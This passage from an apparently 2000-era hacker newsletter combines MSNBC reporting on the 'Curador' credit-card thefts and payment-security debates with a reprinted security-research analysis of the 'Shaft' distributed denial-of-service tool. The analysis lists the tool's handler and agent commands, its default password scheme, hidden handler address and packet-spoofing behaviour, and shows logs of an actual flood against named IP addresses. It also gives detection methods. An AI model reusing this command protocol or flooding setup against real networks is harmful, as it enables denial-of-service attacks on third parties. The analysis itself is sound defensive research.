The businessman said Gray worked part-time for him
for two to three months and was in charge of the company�s
Web site, which sells video games. He was fired on March
2 because of chronic absenteeism, he said.
�HE KNEW HIS STUFF�
.He was very good at his job,. said the man. .Didn�t
turn up very often and his personal hygiene wasn�t too
good, but he knew his stuff.
.He worked developing my company�s e-commerce
site, which he claimed was going to be the most secure in
the business. What I didn�t realize was that I had one of the
world�s biggest credit card hackers looking after my
customers..
Meanwhile, a claim by Gray that a credit card
belonging to Microsoft founder Bill Gates was among the
credit cards he and his friend are accused of stealing was
determined to be false on Monday.
Gray told the Sunday Telegraph that he had sent information
on a number of the cards, including Gates� card, to a U.S.
Web site registered to NBC. (NBC is a partner in MSNBC.com.)
But examination of one of the Web sites posted by
.Curador. showed an entry about William F. Gates. The
Microsoft founder�s name is William H. Gates. The credit
card number listed also had too few digits to be valid, and
both Microsoft�s address and Gates� e-mail address were
incorrect.
Gray and his friend could face charges under Britain�s
Computer Misuse Act of 1990.
They also could eventually be extradited to face
charges in the United States, the FBI�s Vatis told
MSNBC.com on Friday.
.The primary consideration is what�s in the interest of
justice,. said Vatis. .... We have obviously been
investigating violations of U.S. federal criminal law..
The teens are alleged to have caused losses that Vatis
said could amount to more than $3 million, based on the
cost of canceling the 26,000 credit card accounts and
issuing new cards. And Vatis said that was .just one
measure of possible loss.. Other costs could arise from any
fraudulent use of the credit card numbers, as well as the
expense of repairing compromised Web sites, he said.
Live Map: Clynderwen
The arrests in Wales appear to represent the first major
international response to a rapidly growing field in computer
crime. Earlier this month, in response to an MSNBC.com
investigation of international online credit card theft,
spokesmen for the FBI and other organizations involved in
fighting cybercrime said they could not recall any past
prosecutions in such matters.
On Friday, Vatis said he could easily think of
.international hacking incidents. that have led to
prosecutions, but not in the context of online credit card
information.
Many such cases are under investigation, he said. Vatis
said the international hurdles to investigating Internet crime
were not as high as some people might think, contending
that the FBI was .building more and more bridges every
day. with law enforcement agencies in other countries.
-=-
MSNBC supplimentary;
March 24th
Can hackers kill credit cards?
Spate of e-commerce intrusions might mean a new form
of payment system will come sooner than expected
By Bob Sullivan
MSNBC
March 24 � He calls himself .The Saint of
E-commerce.. Two months ago, .Curador. started
posting his catalog of stolen credit card numbers
on his Web page. He stole database after database
from a variety of e-commerce sites, each time
updating his site, then gleefully mailing
notification to reporters. He topped 25,000 records
from 13 Web sites. Despite all that the financial
risk and all that violation of personal privacy, no
one could stop him. But now authorities in Wales
have arrested two 18-year-olds on charges related
to the Curador thefts.
AUTHORITIES, OF COURSE, had always removed
Curador�s Web site � at least a dozen times. No matter; he
used the many free, anonymous Web hosting services
available on the Internet. And as fast as his Web page is
taken down, .Curador. would put up another one.
The 18-year-old computer intruder, who also goes by the
nickname .mind gimp,. told MSNBC in a telephone interview
only that he was located somewhere in Europe.
He wasn�t using the credit cards for financial gain, he
said The self-proclaimed .Saint of E-commerce. said he
simply wanted to embarrass the victim Web sites into
employing better security. He promised to continue breaking
into e-commerce sites and posting stolen numbers .until I
don�t need to do it anymore or until I get arrested..
But until Thursday, as MSNBC�s Mike Brunker
reported earlier this month, there hadn�t been a single
reported arrest of a foreign credit card thief by U.S.
authorities.
Curador�s thefts are just another story in this year�s
litany of tales surrounding online theft of personal and
financial information. E-merchants are furiously fighting the
battle to keep down fraud costs, and consumer confidence
in Internet safety is continually shaken, with no apparent end
in sight. So some experts think Curador may just be another
nail in the coffin of a credit card system that was hardly
designed for Internet purchasing.
.Anyone who�s serious about this is getting a lesson.
The wake-up call is here. The time is now,. said Stephen
Orfei, vice president of electronic commerce and emerging
technology for MasterCard International. Orfei is also the
spokesperson for SETCo, the Visa- and
MasterCard-backed organization pushing SET, a new
payments protocol designed to limit electronic fraud.
�HOW CAN WE DO MORE?�
The raging success of online thieves, some say, will
force the hand of banks, merchants, credit card companies
and consumers to change the way we spend money much
sooner than we intended.
The high-profile hacks have at least gotten the attention
of merchants, said Alyxia Do, electronic payment and smart
card analyst with Frost & Sullivan.
.It seems that there
have been a greater
number of queries coming
in,. she said. .It began
with the CD Universe
break-in and it has just
continued to be in the
news. I have heard more
and more merchants are
going back to Visa and
MasterCard and asking,
�How can we do more?� .
The stakes are higher
for merchants than
consumers. While consumers face a limited liability of $50
and a paperwork hassle, online merchants must write off
credit card theft as .acceptable loss.. Hard data on how
bad losses are is impossible to find, but anecdotally some
industries relate fraud rates as high as 40 percent.
Merchants use inexact software to filter out potential
fraudulent purchases, but that means they turn away
legitimate sales, too.
The mathematics are alarming. In fact, according to Joe
Barrett, chairman of the Internet Fraud prevention Advisory
Council, in some industries, merchants are turning away 20
percent of proposed sales.
.You�re killing your business. You�d be better off
taking every sale and self-insuring,. he said.
SMART CARDS, FINALLY?
"A number and a date and you can buy anything you
want with it.. That�s how a teen-aged Internet credit card
thief described to MSNBC the fundamental problem of
using credit cards online.
The familiar plastic currency was designed to be
physically handed to merchants, who could at least make a
cursory check to see if signatures on the card and the sales
slip matched. Online, commerce is anonymous. There is no
way to see who�s entering the credit card numbers into the
Web page, an anonymity that heavily favors the fraud
artists.
Several technologies hope to tip the scales against
thieves by implementing systems that require some
real-world physical component when shopping online.
Smart cards, the generic term for any plastic which includes
an embedded microchip, are one promising solution.
Smart cards, which identify the user through encrypted
information embedded on the chip, must be inserted into a
.card reader. attached to the computer. That means the
card can�t be used for e-commerce unless the purchaser is
currently holding it.
A PIN number is also required, so a thief needs to
physically have the card and a security code in order to use
it. That�s not an insurmountable hurdle, but a far more
difficult one than using .a number and a date..
Still, smart cards are 20 years old, and while there have
been smatterings of adoption in Europe, trials of the
technology in the U.S. have failed repeatedly. Consumers
perceived them as inconvenient, and in the past they have
been unmoved by the improvement in security.
.In those trials, people still needed to carry around
spare change anyway,. said Don Davis, editor of Card
Technology Magazine. .They didn�t really solve a problem
for people. Now with the Internet, that changes things.
There is a real problem to be solved with smart cards..
And there appears to finally be momentum behind the
chip-enabled cards. Microsoft and Sun are currently battling
over the operating system used to run the cards, and
Windows 2000 includes native support for the technology.
But perhaps the biggest leap forward came last year, when
American Express announced .Blue,. the first widely
distributed smart card in the United States. Blue is a hybrid;
it still has the old-fashioned magnetic strip and can be used
as a traditional credit card. But the embedded chip can be
used for online purchases, and it also can be updated with
new software.
Part of the fresh promise for smart cards comes from
the changing economics in the industry. Card readers, which
must be connected to every PC if smart cards are to be
used, are now cheap enough to be given away. That�s
exactly what American Express decided to do when it
launched .Blue. last year.
.We see a lot of promise to the technology. There is a
real customer need out there,. said Molly Fause, American
Express spokesperson.
BABY STEPS
Still, .Blue. is just a toe in the water. Currently, the
chip only adds convenience � it lets cardholders open a
.digital wallet,. including billing information, with a single
swipe. But it is not used by merchants to positively identify
consumers; instead, the old-fashioned number is used, and it
can be stolen and exploited just like traditional cards.
And that�s been the problem for smart cards all along
� while European governments and institutions have
aggressively supported the technology (for example,
Germany has distributed 80 million cards to all users in its
health care system), U.S. companies have taken baby steps.
Davis points out that U.S. adoption is still likely to be
among the slowest in the world. With aggressive initiatives in
France and Germany already, he said most of Europe will
have converted to smart cards by 2005, with major Latin
American countries following soon after.
Still, the American Express initiative, while tepid, is
important. The company wouldn�t say how many Blue
cards have been issued; Faust would only say the company
has received twice as many applications as anticipated.
Analyst Do said she experts 1.5 million Blue cards to be in
consumers� hands by year�s end.
.Believe me, the rest of the issuers in the U.S. are
closely following what American Express is doing,. he said.
The real goal, he said, is to ply consumers with coupons and
loyalty points they can download onto smart cards, which
will make them an attractive proposition. .If American
Express figures that out, the rest of the industry will react
quickly..
Still, getting Internet users to add hardware to their
existing systems is a tremendous challenge. Davis speculates
that many Blue owners don�t bother to hook up the card
reader, for example. And Do goes farther, suggesting that
the need to add a card reader makes smart cards a
non-starter in the consumer space.
But others say the
shift will be swift, once
consumers are convinced
about the benefits of
smart cards.
.The last paradigm
shift I would liken this to
is the mouse,. said Rick McNeef, vice president of
corporate development at Cybersafe Inc. .How long did it
take us to get a mouse in conjunction with every
keyboard?. He also thinks credit cards have built-in
obsolescence, since they all have an expiration date, and
most of our renewal cards will have chips inside. .Whatever
you have in your wallet right now, the expiration date is
three years or less. There�s an automatic replacement
anyway..
SET MAKES A COMEBACK
Additional hardware isn�t the only available method for
proving someone is who they say they are on the Internet.
The SET (secure electronic transactions) protocol
accomplishes that goal through software. In SET, each
customer receives a unique digital certificate, the
cyberworld equivalent of a real-life signature. The certificate
is .wrapped. around each transaction, and unwrapped by
banks at the other end � no more anonymous commerce.
.It transposes the physical world model into
cyberspace,. said Orfie, speaking on behalf of SETCo.
With each transaction, the consumer and the merchant must
prove they are who they say they are, using the special SET
digital authentication. That gives the bank an .irrefutable
audit trail,. meaning criminals could be traced. More
important, it satisfies the bank�s requirement for a signature
on each transaction, meaning merchants won�t receive those
fraud chargebacks that are currently a part of doing
business online.
But SET, like smart cards, has been slow to get off the
ground. First tested in 1996, the standard appeared to be
dead in the water last year. The SETCo.org Web site lists
only about 25 participating merchants. The extra decryption
processes proved slow and cumbersome; standards
weren�t set, and big e-commerce companies went with the
now-familiar .SLL. instead.
The fear when e-commerce was first introduced was
that ingenious card thieves would listen in on data being
slung around the Internet and pick off credit card
information as it went by, much like a wire tap. So, much
attention was given to Secure Socket Layer, or SSL,
technology, which encrypts the information while it�s in
transit. But SSL says nothing about who�s at either end of
the transaction. And unfortunately, cyber-eavesdropping
has turned out to be a non-issue. The problems begin when
the card number arrives at the merchant, who decrypts it.
But the recent surge of high-profile credit card thefts,
SET and its authentication capabilities are getting a new life,
some say.
.
MSNBC research
.We�ve anticipated this problem, which is now rearing
its ugly little head,. Orfie said. .We�re saying we have a
solution..
Since SET requires a much less costly infrastructure
upgrade, it may be the biggest benefactor from the slew of
hack attacks, Analyst Do said.
.It�s getting up and dusting itself off and starting to walk
again,. she said. .Online hacking will definitely promote
some kind of network security rather than smart cards..
STORES AREN�T BANKS
With either a hardware or a software solution, most
experts say that one fundamental change to the current
payments system is required. Today, merchants are forced
to act like banks. They are acquiring and storing personal
financial records � namely, credit cards.
SET and any of the various smart card proposals can
take this banking role away from retailers. In these new
systems, consumers who hit .submit. on a Web site can
send their purchase request to their own bank. Their bank
then gives the money to the e-commerce store, along with
some kind of unique identifying information. But personal
bank account numbers, or credit card numbers, are never
sent to the Web site.
.The best place for the card to be is to remain in the
banking system,. said Gerry Gay, vice president of sales
and marketing at SafeTpay.com, Inc. His company recently
launched a numeric keypad/card reader that acts like a
mini-ATM when attached to a personal computer. The card
reader immediately encrypts PIN numbers and card
numbers and sends the data directly to banks. Merchants
only receive their money and a tracking number.
.You eliminate another arena where the data can be
compromised,. Gay said. .As things are, you�re entrusting
your card data to someone who�s outside the payment
system..
OLD-FASHIONED BARN RAISING
Still, even with the increased impetus supplied by
cybercrooks, smart cards or any other payment solution
won�t take over overnight. Old habits � at banks,
merchants, and among consumers � die hard. Even if those
old habits are costly.
.The devil you know is better than the devil you don�t
know,. Gay said, describing his company�s challenge in
convincing banks and merchants to support his system.
But no fright over fraud can overcome the challenges of
an upgrade � in the case of smart cards, Analyst Do thinks
a complete overhaul of the system will require $15 billion.
Combine that with the fundamental change either SET or
smart cards would hoist on consumers, and you have some
formidable obstacles.
That makes Barrett, of the Internet Fraud Prevention
Advisory Council, leery.
.A lot of these things create issues for consumers.
They�re moving the pain onto consumers and taking it away
from merchants, and that�s not going to work,. said Barrett,
also an executive at Vitessa Corp., an online payment
company.
That�s why he thinks a very low-tech solution is needed
to deal with credit card crooks. If Barrett had his way,
companies like Amazon.com would open up their internal
fraud databases to all e-merchants. Such an open policy
would quickly create a list of suspicious e-mail addresses,
Internet Service providers, and of course, credit card
numbers.
.I try to encourage people to think about fraud
detection as a public good,. he said. The proposal has so
far fallen on deaf ears, as most merchants see their fraud
data as top-secret proprietary information. .Merchants on
the Internet have tendency to want to wall off and control
and not share their kownledge or incidents of fraud.
.Amazon doesn�t compete as a fraud detection
company. In so doing what they�re doing is hoarding
information � If you live in a dangerous neighborhood, are
you safe if you buy weapons? No. You still haven�t cleaned
up the neighborhood. If the top 100 merchants on the Net
put in place a technology that they could demonstrate
immediately it�s hard for hackers, that would clean up the
neighborhood..
His proposal is not so far, surprisingly, from the
community-based solution proposed by the Saint of
E-Commerce.
.There should be an Internet Bureau of Commerce that
can list every single person on the Internet who accepts
credit cards and people should be invited to try to break
in,. Curador said. .And if you can, then they are listed as
unsafe..
Such lists already exist � but they are shared only
among members of the Internet underground, and like
Curador�s notorious Web page, come and go under cover
of Internet anonymity. That means, for now, the bad guys
appear to be much better at sharing information than the
good guys. And while next-generation payment systems
continue to languish in trials, criminals continue to order
anything they want .with a number and a date..
@HWA
111.0 PSS: Shaft Distributed DoS tool analysis Sven Dietrich
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: Packetstorm Security http://packetstorm.securify.com/
UNFORMATTED = AS IS, WARNING C=SOURCE INCLUDED - Ed
================================================================================
An analysis of the ``Shaft'' distributed denial of service tool
================================================================================
Sven Dietrich
NASA Goddard Space Flight Center
<spock@sled.gsfc.nasa.gov>
Neil Long
Oxford University
<neil.long@computing-services.oxford.ac.uk>
David Dittrich
University of Washington
<dittrich@cac.washington.edu>
Copyright 2000. All rights reserved.
March 13, 2000
-- 1. Introduction
------------------
This is an analysis of the "Shaft" distributed denial of service
(DDoS) tool. Denial of service is a technique to deny access to a
resource by overloading it, such as packet flooding in the network
context. Denial of service tools have existed for a while, whereas
distributed variants are relatively recent. The distributed nature
adds the "many to one" relationship. Throughout this analysis, most
actual host names have been modified or removed.
-- 2. Historical overview
-------------------------
"Shaft" belongs in the family of tools discussed earlier, such as
Trinoo, TFN, Stacheldraht, and TFN2K. Like in those tools, there are
handler (or master) and agent programs. The general concepts of these
tools can be found in a Distributed Intruder Tools Workshop Report held
in November 1999 at the Computer Emergency Response Team Coordination
Center (CERT/CC) in Pittsburgh, Pennsylvania:
http://www.cert.org/reports/dsit_workshop.pdf
In chronological order, there are Trinoo, TFN, Stacheldraht, Shaft, and
TFN2K. Trinoo, TFN, and Stacheldraht were analyzed in [5], [6], and [7]
respectively. TFN2K was recently analyzed in [1].
In the first two months of 2000, DDoS attacks against major Internet
sites (such as CNN, ZDNet, Amazon etc.) have brought these tools
further into the limelight. There are a few papers covering DDoS to
be found at:
http://packetstorm.securify.com/distributed/
http://staff.washington.edu/dittrich/misc/ddos/
http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
-- 3. Analysis
--------------
Shaftnode was recovered, initially in binary form, in late November
1999, then in source form for the agent. Distinctive features are
the ability to switch handler servers and handler ports on the fly,
making detection by intrusion detection tools difficult from that
perspective, a "ticket" mechanism to link transactions, and the
particular interest in packet statistics.
-- 3.1 The network: client(s)-->handler(s)-->agent(s)-->victim(s)
-----------------------------------------------------------------
The "Shaft" network is made up of one or more handler programs
("shaftmaster") and a large set of agents ("shaftnode"). The attacker
uses a telnet program ("client") to connect to and communicate with the
handlers. A "Shaft" network would look like this:
+--------+ +--------+
| client | | client |
+--------+ +--------+
| |
. . . --+------+---------------+------+----------------+-- . . .
| | |
| | |
+-----------+ +-----------+ +-----------+
| handler | | handler | | handler |
+-----------+ +-----------+ +-----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
| | | | |
| | | | |
+-------+ +-------+ +-------+ +-------+ +-------+
| agent | | agent | | agent | | agent | | agent |
+-------+ +-------+ +-------+ +-------+ +-------+
-- 3.2 Network Communication
----------------------------
Client to handler(s): 20432/tcp
Handler to agent(s): 18753/udp
Agent to handler(s): 20433/udp
"Shaft" (in the analyzed version, 1.72) is modeled after Trinoo, in that
communication between handlers and agents is achieved using the
unreliable IP protocol UDP. See Stevens [18] for an extensive discussion of
the TCP and UDP protocols. Remote control is via a simple telnet connection
to the handler. "Shaft" uses "tickets" for keeping track of its individual
agents. Both passwords and ticket numbers have to match for the agent to
execute the request. A simple letter-shifting (Caesar cipher, see Schneier
[17]) is in use.
-- 3.3 Commands
---------------
The command structure is divided into the agent and handler command
syntax groups. The attacker interacts with the handler via a command
line.
-- 3.3.1 Agent Command Syntax
Accepted by agent and replies generated back to the handler:
size <size>
Size of the flood packets.
Generates a "size" reply.
type <0|1|2|3>
Type of DoS to run
0 UDP, 1 TCP, 2 UDP/TCP/ICMP, 3 ICMP
Generates a "type" reply.
time <length>
Length of DoS in seconds
Generates a "time" reply.
own <victim>
Add victim to list of hosts to perform denial of service on
Generates a "owning" reply.
end <victim>
Removes victim from list of hosts (see "own" above)
Generates a "done" reply.
stat
Requests packet statistics from agent
Generates a "pktstat" reply.
alive
Are you alive?
Generates a "alive blah" reply.
switch <handler> <port>
Switch the agent to a new handler and handler port
Generates a "switching" reply.
pktres <host>
Request packet results for that host at the end of the flood
Generates a "pktres" reply.
Sent by agent:
new <password>
Reporting for duty
pktres <password> <sock> <ticket> <packets sent>
Packets sents to the host identified by <ticket> number
-- 3.3.2 Handler (shaftmaster) Command Syntax
Little is known about the handler, but this is a speculation, pieced
together from clues, of how its command structure could look like:
mdos <host list>
Start a distributed denial of service attack (mdos = massive
denial of service?) directed at <host list>.
Sends out "own host" messages to all agents.
edos <host list>
End the above attack on <host list>.
Sends out "end host" messages to all agents.
time <length>
Set the duration of the attack.
Sends out "time <length>" to all agents.
size <packetsize>
Set the packetsize for the attack (8K maximum as seen in
source).
Sends out "size <packetsize>" to all agents.
type <UDP|TCP|ICMP|BOTH>
Set the type of attack, UDP packet flooding, TCP SYN
packet flooding, ICMP packet flooding, or all three (here
BOTH = ICMP amd IP protocols)
Sends "type <type>" to all agents.
+node <host list>
Add new agents
-node <host list>
Remove agents from pool
ns <host list>
Perform a DNS lookup on <host list>
lnod
List all agents
ltic
List all tickets (transactions?)
pkstat
Show total packet statistics for agents
Sends out "stat" request to all agents.
alive
Send an "alive" to all agents.
A possible argument to alive is "hi"
stat
show status?
switch
become the handler for agents
Send "switch" to all agents.
ver
show version
exit
-- 3.4 Password protection
--------------------------
After connecting to the handler using the telnet client, the attacker
is prompted with "login:". Too little is known about the handler or
its encryption method for logging in. A cleartext connection to the handler
port is obviously a weakness.
-- 3.5 Detection
----------------
-- 3.5.1 Binaries and their behavior
As with previous DDoS tools, the methods used to install the handler/agent
will be the same as installing any program on a compromised Unix system,
with all the standard options for concealing the programs and files (e.g.,
use of hidden directories, "root kits", kernel modules, etc.) The
reader is referred to Dittrich's Trinoo analysis [5] for a description of
possible installation methods of this type of tool.
Precautions have been taken to hide the default handler in the binary code.
In the analyzed code, the default handler is defined as follows:
#define MASTER "23:/33/75/28"
which would translate into 129.22.64.17 (electrochem1.echem.cwru.edu)
using the same simple cipher mentioned above. Port numbers are munged
before actual use, e.g.
#define MASTER_PORT 20483
is really port 20433.
All these techniques intend to hide the critical information from prying
eyes performing forensics on the code. The program itself tries to hide
itself as a legitimate Unix process (httpd in the default configuration).
Looking at strings in the shaftnode application reveals the following:
> strings -n 3 shaftnode
pktres
switch
alive
stat
end
own
time
type
size
httpd
23:/33/75/28
Unable to fork. (do it manually)
shift
new %s
size %s %s %s %s
type %s %s %s %s
time %s %s %s %s
owning %s %s %s %s
switched %s %s %s
done %s %s %s %s
pktstat %s %s %s %lu
alive %s %s %s blah
%d.%d.%d.%d
Error sending tcp packet from %s:%i to %lu:%i
pktres %s %i %i %lu
Upon launch, the "Shaft" agent (the "shaftnode") reports back to its
default handler (its "shaftmaster") by sending a "new <upshifted
password>" command. For the default password of "shift" found in the
analyzed code, this would be "tijgu". Therefore a new agent would send
out "new tijgu", and all subsequent messages would carry that password in
it. Only in one case does the agent shift in the opposite direction for
one particular command, e.g. "pktres rghes". It is unclear at the moment
whether this is intentional or not.
Incoming commands arrive in the format:
"command <upshifted password> <command arg> <socket> <ticket> <optional args>"
For most commands, the password and socket/ticket need to have the right magic
in order to generate a reply and the command to be executed.
Message flow diagram between handler H and agent A:
Initial phase: A -> H: "new", f(password)
Running loop: H -> A: cmd, f(password), [args], Na, Nb
A -> H: cmdrep, f(password), Na, Nb, [args]
- f(X) is the Caesar cipher function on X
- Na, Nb are numbers (tickets, socket numbers)
- cmd, cmdrep are commands and command acknowledgments
- args are command arguments
The flooding occurs in bursts of 100 packets per host, with the source
port and source address randomized. This number is hard-coded, but it is
believed that more flexibility can be added. Whereas the source port
spoofing only works if the agent is running as a root privileged process,
the author has added provisions for packet flooding using the UDP protocol
and with the correct source address in the case the process is running as a
simple user process. It is noteworthy that the random function is not
properly seeded, which may lead to predictable source port sequences and
source host IP sequences.
Source port = (rand() % (65535-1024)+1024) where % is the
mathematical 'mod' operator
This will generate source ports greater than 1024 at all times.
Source IP = rand()%255.rand()%255.rand()%255.rand()%255
The source IP numbers can (and will) contain a zero in the leading
octet.
Additionally, the sequence number for all TCP packets is fixed, namely
0x28374839, which helps with respect to detection at the network level.
The ACK and URGENT flags are randomly set, except on some platforms.
Destination ports for TCP and UDP packet floods are randomized.
The client must choose the duration ("time"), size of packets, and type
of packet flooding directed at the victim hosts. Each set of hosts has its
own duration, which gets divided evenly across all hosts. This is unlike TFN
[2] which forks an individual process for each victim host. For the type,
the client can select UDP, TCP SYN, ICMP packet flooding, or the combination
of all three. Even though there is potential of having a different type and
packet size for each set of victim hosts, this feature is not exploited
in this version.
The author of "Shaft" seems to have a particular interest in statistics,
namely packet generation rates of its individual agents. The statistics on
packet generation rates are possibly used to determine the "yield" of the
DDoS network as a whole. This would allow the attacker to stop adding hosts
to the attack network when it reached the necessary size to overwhelm the
victim network, and to know when it is necessary to add more agents to
compensate for loss of agents due to attrition during an attack (as the
agent systems are identified and taken off-line.)
Currently, the ability to switch host IP and port for the handler exists,
but the listening port for the agent remains the same. It is foreseeable
that this will change in the future.
-- 3.5.2 A sample attack
In this section we will look at a practical example of an attack carried
out with the "Shaft" distributed denial of service attack tool, as seen
from the attacking network perspective.
The shaftnode agent when in use, as seen by "lsof" [10]:
# lsof -c shaftnode
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
shaftnode 13489 root cwd VDIR 0,0 400 2 /tmp
shaftnode 13489 root txt VREG 0,0 19492 10 /tmp (swap)
shaftnode 13489 root txt VREG 32,0 662764 182321 /usr/lib/libc.so.1
shaftnode 13489 root txt VREG 32,0 17480 210757 /usr/platform/sun4u/lib/libc_psr.so.1
shaftnode 13489 root txt VREG 32,0 566700 182335 /usr/lib/libnsl.so.1
shaftnode 13489 root txt VREG 32,0 39932 182348 /usr/lib/libw.so.1
shaftnode 13489 root txt VREG 32,0 15720 182334 /usr/lib/libmp.so.1
shaftnode 13489 root txt VREG 32,0 15720 182327 /usr/lib/libintl.so.1
shaftnode 13489 root txt VREG 32,0 68780 182342 /usr/lib/libsocket.so.1
shaftnode 13489 root txt VREG 32,0 2564 182324 /usr/lib/libdl.so.1
shaftnode 13489 root txt VREG 32,0 137160 182315 /usr/lib/ld.so.1
shaftnode 13489 root 0u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
shaftnode 13489 root 1u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
shaftnode 13489 root 2u inet 0x507dc770 0t116 TCP hostname:ftp->electrochem1.echem.cwru.edu:53982 (CLOSE_WAIT)
shaftnode 13489 root 3u inet 0x5032c7d8 0t0 UDP *:18753 (Idle)
As one can see, the agent is waiting to receive commands on its default
UDP port number 18753. The TCP connection back to the handler remains
unexplained to date.
Packet flows:
Date Time Protocol Source IP/Port Flow Destination IP/Port
Sun 11/28 21:39:22 tcp 129.22.64.17.53982 <-> x.x.x.x.21
Sun 11/28 21:39:56 udp x.x.x.x.33198 -> 129.22.64.17.20433
Sun 11/28 21:45:20 udp 129.22.64.17.1765 -> x.x.x.x.18753
Sun 11/28 21:45:20 udp x.x.x.x.33199 -> 129.22.64.17.20433
Sun 11/28 21:45:59 udp 129.22.64.17.1866 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp x.x.x.x.33200 -> 129.22.64.17.20433
Sun 11/28 21:45:59 udp 129.22.64.17.1968 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1046 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1147 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1248 -> x.x.x.x.18753
Sun 11/28 21:45:59 udp 129.22.64.17.1451 -> x.x.x.x.18753
Sun 11/28 21:46:00 udp x.x.x.x.33201 -> 129.22.64.17.20433
Sun 11/28 21:46:00 udp x.x.x.x.33202 -> 129.22.64.17.20433
Sun 11/28 21:46:01 udp x.x.x.x.33203 -> 129.22.64.17.20433
Sun 11/28 21:48:37 udp 129.22.64.17.1037 -> x.x.x.x.18753
Sun 11/28 21:48:37 udp 129.22.64.17.1239 -> x.x.x.x.18753
Sun 11/28 21:48:37 udp 129.22.64.17.1340 -> x.x.x.x.18753
Sun 11/28 21:48:37 udp 129.22.64.17.1442 -> x.x.x.x.18753
Sun 11/28 21:48:38 udp x.x.x.x.33204 -> 129.22.64.17.20433
Sun 11/28 21:48:38 udp x.x.x.x.33205 -> 129.22.64.17.20433
Sun 11/28 21:48:38 udp x.x.x.x.33206 -> 129.22.64.17.20433
Sun 11/28 21:48:56 udp 129.22.64.17.1644 -> x.x.x.x.18753
Sun 11/28 21:48:56 udp x.x.x.x.33207 -> 129.22.64.17.20433
Sun 11/28 21:49:59 udp x.x.x.x.33208 -> 129.22.64.17.20433
Sun 11/28 21:50:00 udp x.x.x.x.33209 -> 129.22.64.17.20433
Sun 11/28 21:50:14 udp 129.22.64.17.1747 -> x.x.x.x.18753
Sun 11/28 21:50:14 udp x.x.x.x.33210 -> 129.22.64.17.20433
There is quite some activity between the handler and the agent, as they
go through the command request and acknowledgement phases. There
was also what appeared to be testing of the impact on the local
network itself with ICMP packet flooding, for which we omit the data
here due to size limitations.
Let us look at the individual phases from a later attack.
Setup and configuration phase:
date time src dest dest-port command
4 Dec 1999 18:06:40 129.22.64.17 x.x.x.x 18753 alive tijgu hi 5 8170
4 Dec 1999 18:09:14 129.22.64.17 x.x.x.x 18753 time tijgu 700 5 6437
4 Dec 1999 18:09:14 x.x.x.x 129.22.64.17 20433 time tijgu 5 6437 700
4 Dec 1999 18:09:16 129.22.64.17 x.x.x.x 18753 size tijgu 4096 5 8717
4 Dec 1999 18:09:16 x.x.x.x 129.22.64.17 20433 size tijgu 5 8717 4096
4 Dec 1999 18:09:23 129.22.64.17 x.x.x.x 18753 type tijgu 2 5 9003
The handler issues an "alive" command, and says "hi" to its agent,
assigning a socket number of "5" and a ticket number of 8170. We will see
that this "socket number" will persist throughout this attack. A time
period of 700 seconds is assigned to the agent, which is acknowledged. A
packet size of 4096 bytes is specified, which is again confirmed. The
last line indicates the type of attack, in this case "the works", i.e.
UDP, TCP SYN and ICMP packet flooding combined. Failure to specify the type
would make the agent default to UDP packet flooding.
Now the list of hosts to attack and which ones they want statistics from
on completion:
date time src dest dest-port command
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 207.229.143.6 5 5256
4 Dec 1999 18:09:24 x.x.x.x 129.22.64.17 20433 owning tijgu 5 5256 207.229.143.6
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 pktres tijgu 207.229.143.6 5 1993
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 24.7.231.128 5 78
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 pktres tijgu 24.218.58.101 5 8845
4 Dec 1999 18:09:24 129.22.64.17 x.x.x.x 18753 own tijgu 18.85.13.107 5 6247
4 Dec 1999 18:09:25 129.22.64.17 x.x.x.x 18753 own tijgu 24.218.52.44 5 4190
4 Dec 1999 18:09:25 129.22.64.17 x.x.x.x 18753 own tijgu 207.175.72.15 5 2376
4 Dec 1999 18:09:25 x.x.x.x 129.22.64.17 20433 owning tijgu 5 78 24.7.231.128
4 Dec 1999 18:09:26 x.x.x.x 129.22.64.17 20433 owning tijgu 5 6247 18.85.13.107
4 Dec 1999 18:09:27 x.x.x.x 129.22.64.17 20433 owning tijgu 5 4190 24.218.52.44
4 Dec 1999 18:09:28 x.x.x.x 129.22.64.17 20433 owning tijgu 5 2376 207.175.72.15
4 Dec 1999 18:21:04 x.x.x.x 129.22.64.17 20433 pktres rghes 5 1993 51600
4 Dec 1999 18:21:04 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400
4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51500
4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400
4 Dec 1999 18:21:07 x.x.x.x 129.22.64.17 20433 pktres rghes 0 0 51400
Now that all other parameters are set, the handler issues several "own"
commands, in effect specifying the victim hosts. Those commands are
acknowledged by the agent with an "owning" reply. The flooding occurs as
soon as the first victim host gets added. The handler also requests
packet statistics from the agents for certain victim hosts (e.g. "pktres
tijgu 207.229.143.6 5 1993"). Note that the reply comes back with the
same identifiers ("5 1993") at the end of the 700 second packet flood,
indicating that 51600 sets of packets were sent. One should realize that,
if successful, this means 51600 x 3 packets due to the configuration of
all three (UDP, TCP, and ICMP) types of packets. In turn, this results
in roughly 220 4096 byte packets per second per host, or about 900
kilobytes per second per victim host from this agent alone, about 4.5
megabytes per second total for this little exercise.
Note the reverse shift ("shift" becomes "rghes", rather than "tijgu") for
the password on the packet statistics.
-- 3.5.3 Detection at the network level
Scanning the network for open port 20432 will reveal the presence of a
handler on your LAN.
For detecting idle agents, one could write a program similar to George
Weaver's trinoo detector. Sending out "alive" messages with the default
password to all nodes on a network on the default UDP port 18753 will
generate traffic back to the detector, making the agent believe the
detector is a handler.
This program does not provide for code updates (like TFN or Stacheldraht).
